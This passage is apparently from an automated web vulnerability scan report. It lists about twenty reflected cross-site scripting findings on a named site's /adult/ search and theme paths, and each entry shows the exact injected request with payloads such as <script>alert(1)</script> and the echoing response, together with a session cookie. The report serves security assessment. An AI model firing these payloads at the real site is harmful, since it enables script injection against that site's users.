<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/search.php?a9445<script>alert(1)</script>a05532bc6cf=1 was not found on this server.</p>
...[SNIP]...

2.319. http://www.resellerbase.com/adult/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload e31f6<a>dc87d1371cd was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/search.php?keyword=search...&Submit3=Search&opt=2e31f6<a>dc87d1371cd HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/search.php?keyword=search...&Submit3=Search&opt=2e31f6<a>dc87d1371cd was not found on this server.</p>
...[SNIP]...

2.320. http://www.resellerbase.com/adult/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/search.php

Issue detail

The value of the opt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 638db"><a>47f2e19115c was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

POST /adult/search.php?cat=7&keyword=search...&Submit3=Search&opt=1638db"><a>47f2e19115c HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/search.php?cat=7&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:37:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 55966

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="/adult/search.php?cat=7&keyword=search...&Submit3=Search&opt=1638db"><a>47f2e19115c/more2.html" style="color: ">
...[SNIP]...

2.321. http://www.resellerbase.com/adult/search.php [select parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/search.php

Issue detail

The value of the select request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e012e"><a>ec6a430b532 was submitted in the select parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/search.php?cat=7&keyword=search...&Submit3=Search&opt=1&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252fe012e"><a>ec6a430b532 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/search.php?cat=7&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:38:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 56120

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="/adult/search.php?cat=7&keyword=search...&Submit3=Search&opt=1&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252fe012e"><a>ec6a430b532/more2.html" style="color: ">
...[SNIP]...

2.322. http://www.resellerbase.com/adult/search.php [select parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/search.php

Issue detail

The value of the select request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e3f3"><script>alert(1)</script>f967a08cd9a was submitted in the select parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/search.php?cat=7&keyword=search...&Submit3=Search&opt=1&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f3e3f3"><script>alert(1)</script>f967a08cd9a&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/search.php?cat=7&keyword=search...&Submit3=Search&opt=1&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:38:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 56318

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="/adult/search.php?cat=7&keyword=search...&Submit3=Search&opt=1&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f3e3f3"><script>alert(1)</script>f967a08cd9a&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f/more2.html" style="color: ">
...[SNIP]...

2.323. http://www.resellerbase.com/adult/themes/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c9c90<script>alert(1)</script>964ad275719 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adultc9c90<script>alert(1)</script>964ad275719/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adultc9c90<script>alert(1)</script>964ad275719/themes/ was not found on this server.</p>
...[SNIP]...

2.324. http://www.resellerbase.com/adult/themes/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6349f<script>alert(1)</script>1036de8c877 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes6349f<script>alert(1)</script>1036de8c877/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes6349f<script>alert(1)</script>1036de8c877/ was not found on this server.</p>
...[SNIP]...

2.325. http://www.resellerbase.com/adult/themes/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload fdedd<script>alert(1)</script>86719abc024 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/?fdedd<script>alert(1)</script>86719abc024=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/?fdedd<script>alert(1)</script>86719abc024=1 was not found on this server.</p>
...[SNIP]...

2.326. http://www.resellerbase.com/adult/themes/kosmos/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 648c9<script>alert(1)</script>2d7d06ebf68 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult648c9<script>alert(1)</script>2d7d06ebf68/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult648c9<script>alert(1)</script>2d7d06ebf68/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.327. http://www.resellerbase.com/adult/themes/kosmos/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 20257<script>alert(1)</script>359856fe6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes20257<script>alert(1)</script>359856fe6/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes20257<script>alert(1)</script>359856fe6/kosmos/ was not found on this server.</p>
...[SNIP]...

2.328. http://www.resellerbase.com/adult/themes/kosmos/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ea1f4<script>alert(1)</script>fdca2fbe716 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmosea1f4<script>alert(1)</script>fdca2fbe716/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmosea1f4<script>alert(1)</script>fdca2fbe716/ was not found on this server.</p>
...[SNIP]...

2.329. http://www.resellerbase.com/adult/themes/kosmos/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a1dbf<script>alert(1)</script>f06fb74cffd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/?a1dbf<script>alert(1)</script>f06fb74cffd=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/?a1dbf<script>alert(1)</script>f06fb74cffd=1 was not found on this server.</p>
...[SNIP]...

2.330. http://www.resellerbase.com/adult/themes/kosmos/images/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bc223<script>alert(1)</script>da7cc576b3d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adultbc223<script>alert(1)</script>da7cc576b3d/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adultbc223<script>alert(1)</script>da7cc576b3d/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.331. http://www.resellerbase.com/adult/themes/kosmos/images/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fa4c2<script>alert(1)</script>599bd658ae6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themesfa4c2<script>alert(1)</script>599bd658ae6/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themesfa4c2<script>alert(1)</script>599bd658ae6/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.332. http://www.resellerbase.com/adult/themes/kosmos/images/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b38c8<script>alert(1)</script>621eb4ce21 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmosb38c8<script>alert(1)</script>621eb4ce21/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

2.333. http://www.resellerbase.com/adult/themes/kosmos/images/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 28791<script>alert(1)</script>65878c2e52b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images28791<script>alert(1)</script>65878c2e52b/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images28791<script>alert(1)</script>65878c2e52b/ was not found on this server.</p>
...[SNIP]...

2.334. http://www.resellerbase.com/adult/themes/kosmos/images/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload faa45<script>alert(1)</script>1d823561eab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images/?faa45<script>alert(1)</script>1d823561eab=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/?faa45<script>alert(1)</script>1d823561eab=1 was not found on this server.</p>
...[SNIP]...

2.335. http://www.resellerbase.com/adult/themes/kosmos/images/folder.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f76b1<script>alert(1)</script>b3b1e232e50 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adultf76b1<script>alert(1)</script>b3b1e232e50/themes/kosmos/images/folder.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adultf76b1<script>alert(1)</script>b3b1e232e50/themes/kosmos/images/folder.gif was not found on this server.</p>
...[SNIP]...

2.336. http://www.resellerbase.com/adult/themes/kosmos/images/folder.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 73b33<script>alert(1)</script>eea7011fbd8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes73b33<script>alert(1)</script>eea7011fbd8/kosmos/images/folder.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes73b33<script>alert(1)</script>eea7011fbd8/kosmos/images/folder.gif was not found on this server.</p>
...[SNIP]...

2.337. http://www.resellerbase.com/adult/themes/kosmos/images/folder.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload af3c7<script>alert(1)</script>b0df3a7ae6a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmosaf3c7<script>alert(1)</script>b0df3a7ae6a/images/folder.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmosaf3c7<script>alert(1)</script>b0df3a7ae6a/images/folder.gif was not found on this server.</p>
...[SNIP]...

2.338. http://www.resellerbase.com/adult/themes/kosmos/images/folder.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7f87c<script>alert(1)</script>0181e746451 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images7f87c<script>alert(1)</script>0181e746451/folder.gif HTTP/1.1
Host: www.resellerbase.com
